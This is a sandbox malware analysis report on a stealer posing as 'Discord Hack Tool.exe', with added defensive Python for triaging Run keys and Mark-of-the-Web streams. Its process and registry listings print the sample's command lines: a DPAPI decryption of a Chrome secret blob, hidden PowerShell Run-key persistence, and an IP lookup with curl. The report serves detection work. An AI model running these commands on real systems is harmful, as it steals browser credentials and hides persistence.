Malware Analysis Report

2025-06-15 22:32

Sample ID 241102-maw59stlhk
Target https://mega.nz/file/ps1WVI4C#4Ora6QCwbLreKoWbQVQCdGpJze4nYQdeHyypMx-b2dU
Tags
collection defense_evasion discovery execution persistence spyware stealer
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Threat Level: Likely malicious

The file https://mega.nz/file/ps1WVI4C#4Ora6QCwbLreKoWbQVQCdGpJze4nYQdeHyypMx-b2dU was found to be: Likely malicious.

Malicious Activity Summary

collection defense_evasion discovery execution persistence spyware stealer

Blocklisted process makes network request

Command and Scripting Interpreter: PowerShell

Executes dropped EXE

Reads user/profile data of web browsers

Loads dropped DLL

Clipboard Data

Hide Artifacts: Hidden Window

Adds Run key to start application

Looks up external IP address via web service

Legitimate hosting services abused for malware hosting/C2

An obfuscated cmd.exe command-line is typically used to evade detection.

Enumerates processes with tasklist

Subvert Trust Controls: Mark-of-the-Web Bypass

Browser Information Discovery

Enumerates physical storage devices

Uses Task Scheduler COM API

Scheduled Task/Job: Scheduled Task

Suspicious use of SendNotifyMessage

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of FindShellTrayWindow

Suspicious use of AdjustPrivilegeToken

Modifies registry key

NTFS ADS

Enumerates system info in registry

Modifies registry class

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Detects videocard installed

Kills process with taskkill

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-02 10:16

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-02 10:16

Reported

2024-11-02 10:17

Platform

win11-20241007-en

Max time kernel

58s

Max time network

66s

Command Line

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://mega.nz/file/ps1WVI4C#4Ora6QCwbLreKoWbQVQCdGpJze4nYQdeHyypMx-b2dU

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\system32\curl.exe N/A

Clipboard Data

collection
Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\Downloads\Discord Hack Tool.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\Downloads\Discord Hack Tool.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\Run\Powershell = "\"powershell.exe\" -WindowStyle Hidden -ExecutionPolicy Bypass -File \"C:\\Users\\Admin\\AppData\\Roaming\\kNPBRiEUjxJrLAI.ps1\"" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\Run\Steam = "C:\\Users\\Admin\\Downloads\\Discord Hack Tool.exe" C:\Windows\system32\reg.exe N/A
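Decoded from the sandbox's escaped display, the two Run values above are "powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Roaming\kNPBRiEUjxJrLAI.ps1" under the value name Powershell (written by powershell.exe itself) and the unquoted path C:\Users\Admin\Downloads\Discord Hack Tool.exe under the value name Steam (written through reg.exe). The Python below is an added example and not part of the sandbox report: it applies the checks an analyst runs over HKCU Run entries (script-host image, hidden window, execution-policy bypass, user-writable location, value name borrowed from a product, unquoted image path with spaces) to those two values plus a benign control entry that is not from the report. The decoy-name list and the extension heuristic used to resolve an unquoted image offline are assumptions of the example; on a live host the input would come from reg query or winreg instead of the constructed list.

```python
import re
from dataclasses import dataclass, field

# Script hosts that should rarely be a user's autostart image.
INTERPRETERS = {
    "powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
    "mshta.exe", "rundll32.exe", "regsvr32.exe",
}
# Directories an unprivileged user can write to (lower-case path fragments).
USER_WRITABLE = (r"\appdata\roaming", r"\appdata\local\temp", r"\downloads",
                 r"\users\public", r"\programdata")
# Value names that borrow a well-known product name; assumed list for this example.
DECOY_NAMES = {"steam", "discord", "chrome", "edge", "windows defender"}
EXE_EXT = (".exe", ".com", ".bat", ".cmd", ".scr", ".vbs", ".js", ".ps1")


@dataclass
class RunEntry:
    name: str
    data: str
    image: str = ""
    args: list = field(default_factory=list)
    findings: list = field(default_factory=list)


def _split_args(rest: str) -> list:
    """Tokenise the remainder of a command line: quoted strings or bare words."""
    return [q if q else b for q, b in re.findall(r'"([^"]*)"|(\S+)', rest)]


def parse_command(data: str):
    """Return (image path, args, image_was_quoted) for a Run value.

    Mirrors CreateProcess with no lpApplicationName: a leading quote delimits
    the image; otherwise Windows tries each space-separated prefix in turn
    (C:\\Users\\Admin\\Downloads\\Discord, then ...\\Discord Hack, ...) until one
    exists on disk. Offline we cannot stat files, so the first prefix ending in
    an executable extension is taken instead (assumption of this example).
    """
    data = data.strip()
    if data.startswith('"'):
        end = data.find('"', 1)
        image = data[1:end] if end > 0 else data[1:]
        rest = data[end + 1:] if end > 0 else ""
        return image, _split_args(rest), True
    words = data.split(" ")
    for i in range(1, len(words) + 1):
        candidate = " ".join(words[:i])
        if candidate.lower().endswith(EXE_EXT):
            return candidate, _split_args(" ".join(words[i:])), False
    return words[0], _split_args(" ".join(words[1:])), False


def triage_run_entry(name: str, data: str) -> RunEntry:
    """Apply the usual analyst heuristics to one Run value."""
    entry = RunEntry(name=name, data=data)
    image, args, quoted = parse_command(data)
    entry.image, entry.args = image, args
    base = image.rsplit("\\", 1)[-1].lower()
    joined = " ".join(a.lower() for a in args)

    if base in INTERPRETERS:
        entry.findings.append("script-interpreter autostart")
    if re.search(r"-w(indowstyle)?\s+hidden", joined):
        entry.findings.append("hidden window")
    if re.search(r"-(ex(ecutionpolicy)?|ep)\s+bypass", joined):
        entry.findings.append("execution-policy bypass")
    for path in [image, *args]:          # image or any argument in a user-writable dir
        if any(d in path.lower() for d in USER_WRITABLE):
            entry.findings.append(f"runs from user-writable location: {path}")
            break
    if not quoted and " " in image:
        entry.findings.append("unquoted image path containing spaces")
    if name.lower() in DECOY_NAMES and "\\program files" not in image.lower():
        entry.findings.append(f"value name '{name}' mimics a product not installed at that path")
    return entry


def verdict(entry: RunEntry) -> str:
    n = len(entry.findings)
    return "suspicious" if n >= 2 else ("review" if n == 1 else "benign")


def triage_all(values):
    """values: iterable of (value name, value data) -> {name: {verdict, findings, image}}."""
    out = {}
    for name, data in values:
        e = triage_run_entry(name, data)
        out[name] = {"verdict": verdict(e), "findings": e.findings, "image": e.image}
    return out


# Constructed input: the two Run values from this report (unescaped) plus a
# benign control entry that does not come from the report.
SAMPLE_RUN_VALUES = [
    ("Powershell",
     r'"powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Roaming\kNPBRiEUjxJrLAI.ps1"'),
    ("Steam", r"C:\Users\Admin\Downloads\Discord Hack Tool.exe"),
    ("SecurityHealth", r"C:\Windows\System32\SecurityHealthSystray.exe"),
]

if __name__ == "__main__":
    for name, r in triage_all(SAMPLE_RUN_VALUES).items():
        print(f"{r['verdict']:<10} {name}: {r['image']}")
        for f in r["findings"]:
            print(f"           - {f}")
```

Both report values come out as suspicious because each trips at least two heuristics, while the control comes out benign. The unquoted Steam value deserves a second look on its own: with spaces and no quotes, CreateProcess tries C:\Users\Admin\Downloads\Discord.exe before the full name, so a file planted under that name in the same folder would run in place of the stealer at the next logon.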

Hide Artifacts: Hidden Window

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A discord.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A

An obfuscated cmd.exe command-line is typically used to evade detection.

Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A

Enumerates processes with tasklist

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

Subvert Trust Controls: Mark-of-the-Web Bypass

defense_evasion
Description Indicator Process Target
File opened for modification C:\Users\Admin\Downloads\Discord Hack Tool.exe:Zone.Identifier C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix C:\Windows\system32\BackgroundTransferHost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\system32\BackgroundTransferHost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" C:\Windows\system32\BackgroundTransferHost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\MuiCache C:\Windows\system32\BackgroundTransferHost.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A

NTFS ADS

Description Indicator Process Target
File opened for modification C:\Users\Admin\Downloads\Unconfirmed 111331.crdownload:SmartScreen C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Users\Admin\Downloads\Discord Hack Tool.exe:Zone.Identifier C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
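Both Zone.Identifier rows (here and under Subvert Trust Controls: Mark-of-the-Web Bypass above) record msedge.exe opening the stream for modification on the file it had just downloaded, which is how Chromium-based browsers apply the mark; the SmartScreen stream on the .crdownload is written by Edge for the same download. The bypass signature therefore fires on the browser's own write, not on the dropped EXE removing its mark. The check that matters is whether the stream is still present and intact on Discord Hack Tool.exe after the sample has run. The Python below is an added example, not part of the sandbox report: it reads a Zone.Identifier stream through the path:stream syntax where NTFS is available, parses it, and classifies the result, including a stripped stream, a stream relabelled to a trusted zone, and a truncated stream. The stream contents are constructed for the example; the report does not show the real ones.

```python
import configparser

ZONE_NAMES = {0: "Local machine", 1: "Local intranet", 2: "Trusted sites",
              3: "Internet", 4: "Restricted sites"}


def read_stream(path: str, stream: str = "Zone.Identifier"):
    """Read an NTFS alternate data stream via the path:stream syntax.

    Returns None when the stream is absent or the filesystem has no ADS
    support, so on a non-Windows host this always returns None.
    """
    try:
        with open(f"{path}:{stream}", encoding="utf-8", errors="replace") as fh:
            return fh.read()
    except OSError:
        return None


def parse_zone_identifier(text):
    """Parse Zone.Identifier content; None means there is no stream at all."""
    result = {"present": False, "zone_id": None, "zone": None,
              "referrer": None, "host": None, "malformed": False}
    if text is None:
        return result
    result["present"] = True
    cp = configparser.ConfigParser(interpolation=None)   # URLs may contain '%'
    try:
        cp.read_string(text)
    except configparser.Error:          # e.g. keys with no [ZoneTransfer] header
        result["malformed"] = True
        return result
    if not cp.has_section("ZoneTransfer"):
        result["malformed"] = True
        return result
    sect = cp["ZoneTransfer"]
    zone_raw = sect.get("ZoneId")
    if zone_raw is None or not zone_raw.strip().isdigit():
        result["malformed"] = True      # stream exists but carries no usable zone
    else:
        result["zone_id"] = int(zone_raw)
        result["zone"] = ZONE_NAMES.get(result["zone_id"], "unknown")
    result["referrer"] = sect.get("ReferrerUrl")
    result["host"] = sect.get("HostUrl")
    return result


def assess(path: str, text) -> dict:
    """Classify a file's Mark-of-the-Web state the way a dropped EXE is checked."""
    info = parse_zone_identifier(text)
    if not info["present"]:
        verdict = "unmarked"             # never tagged, or stripped after download
    elif info["malformed"]:
        verdict = "present-but-unusable"
    elif info["zone_id"] in (3, 4):
        verdict = "marked-internet"      # SmartScreen and protected view apply
    else:
        verdict = "marked-trusted"       # a local/intranet zone on a web download is itself odd
    return {"path": path, "verdict": verdict, **info}


def assess_all(streams):
    return {p: assess(p, t) for p, t in streams.items()}


# Constructed stream contents (not taken from the report) keyed by file path.
SAMPLE_STREAMS = {
    r"C:\Users\Admin\Downloads\Discord Hack Tool.exe":
        "[ZoneTransfer]\r\nZoneId=3\r\nReferrerUrl=https://mega.nz/\r\nHostUrl=https://mega.nz/\r\n",
    r"C:\Users\Admin\Downloads\stripped.exe": None,                      # stream deleted
    r"C:\Users\Admin\Downloads\relabelled.exe": "[ZoneTransfer]\r\nZoneId=1\r\n",
    r"C:\Users\Admin\Downloads\broken.exe": "ZoneId=3\r\n",             # no section header
}

if __name__ == "__main__":
    for p, r in assess_all(SAMPLE_STREAMS).items():
        print(f"{r['verdict']:<22} zone={str(r['zone']):<14} host={r['host']} {p}")
```

On a Windows host, replace the constructed dictionary with {path: read_stream(path) for path in paths}; an "unmarked" verdict on a file the browser is known to have downloaded is the real Mark-of-the-Web bypass, and the ReferrerUrl/HostUrl fields give the download source as an indicator.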

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (4 events) N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe (2 events) N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (4 events) N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (43 events) N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: 33, SeIncBasePriorityPrivilege N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege (2 events) N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36 (same 21-privilege set enabled in two WMIC invocations; a third listing ends at SeSystemEnvironmentPrivilege where the page's 64 rows stop) N/A C:\Windows\System32\Wbem\WMIC.exe N/A

The numeric tokens are privilege LUIDs the sandbox did not resolve to names: 33 = SeIncreaseWorkingSetPrivilege, 34 = SeTimeZonePrivilege, 35 = SeCreateSymbolicLinkPrivilege, 36 = SeDelegateSessionUserImpersonatePrivilege. Enabling the whole administrator privilege set at once is standard wmic.exe start-up behaviour, and tasklist.exe and taskkill.exe enable SeDebugPrivilege on every run, so these rows identify which built-in tools the sample launched rather than a privilege-escalation step of its own.

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (35 events) N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 5728 wrote to memory of 2972 (2 events) N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5728 wrote to memory of 3128 (40 events) N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5728 wrote to memory of 4364 (2 events) N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5728 wrote to memory of 2056 (20 events) N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

All 64 rows shown are the Edge browser process (PID 5728) writing into its own child processes, which is how the Chromium sandbox broker sets up each child at launch; no write from the sample or its scripts into a foreign process appears in the rows shown.

Uses Task Scheduler COM API

persistence

Processes

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://mega.nz/file/ps1WVI4C#4Ora6QCwbLreKoWbQVQCdGpJze4nYQdeHyypMx-b2dU

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffac1093cb8,0x7ffac1093cc8,0x7ffac1093cd8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1900,10520952442971786462,10653601658162394679,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1828 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1900,10520952442971786462,10653601658162394679,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2352 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1900,10520952442971786462,10653601658162394679,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2772 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,10520952442971786462,10653601658162394679,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3216 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,10520952442971786462,10653601658162394679,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3224 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1900,10520952442971786462,10653601658162394679,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5072 /prefetch:8

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x00000000000004CC 0x00000000000004C8

C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1900,10520952442971786462,10653601658162394679,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5404 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1900,10520952442971786462,10653601658162394679,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5488 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,10520952442971786462,10653601658162394679,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5564 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,10520952442971786462,10653601658162394679,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5484 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,10520952442971786462,10653601658162394679,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5456 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,10520952442971786462,10653601658162394679,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5600 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,10520952442971786462,10653601658162394679,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5544 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1900,10520952442971786462,10653601658162394679,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6196 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1900,10520952442971786462,10653601658162394679,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5588 /prefetch:8

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Windows\system32\BackgroundTransferHost.exe

"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.13

C:\Users\Admin\Downloads\Discord Hack Tool.exe

"C:\Users\Admin\Downloads\Discord Hack Tool.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "type .\temp.ps1 | powershell.exe -noprofile -"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" type .\temp.ps1 "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -noprofile -

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lkpv3aqj\lkpv3aqj.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5743.tmp" "c:\Users\Admin\AppData\Local\Temp\lkpv3aqj\CSCFE21C5C5317A4A3B81B3616149D2A28F.TMP"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM msedge.exe /F"

C:\Windows\system32\taskkill.exe

taskkill /IM msedge.exe /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,113,154,240,142,21,157,156,78,160,101,81,241,32,249,16,209,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,211,28,158,119,153,136,182,186,182,140,27,224,31,42,98,129,163,229,214,162,157,251,88,76,220,88,221,7,153,80,43,164,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,73,238,243,217,56,219,60,215,158,4,156,83,176,178,11,120,89,232,124,19,242,192,178,55,240,49,194,69,138,96,135,246,48,0,0,0,247,207,103,230,202,205,245,16,28,172,229,124,165,210,103,11,12,196,151,9,133,66,194,65,60,120,27,246,170,191,96,70,11,157,69,109,12,146,76,15,40,174,22,143,72,151,144,247,64,0,0,0,115,234,32,151,10,195,106,72,177,234,146,232,226,223,217,32,37,34,73,140,60,63,44,119,69,178,221,216,32,90,64,50,251,204,43,72,162,246,93,112,88,166,6,206,203,162,130,9,122,1,244,137,33,40,119,80,4,220,69,84,249,136,212,38), $null, 'CurrentUser')"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

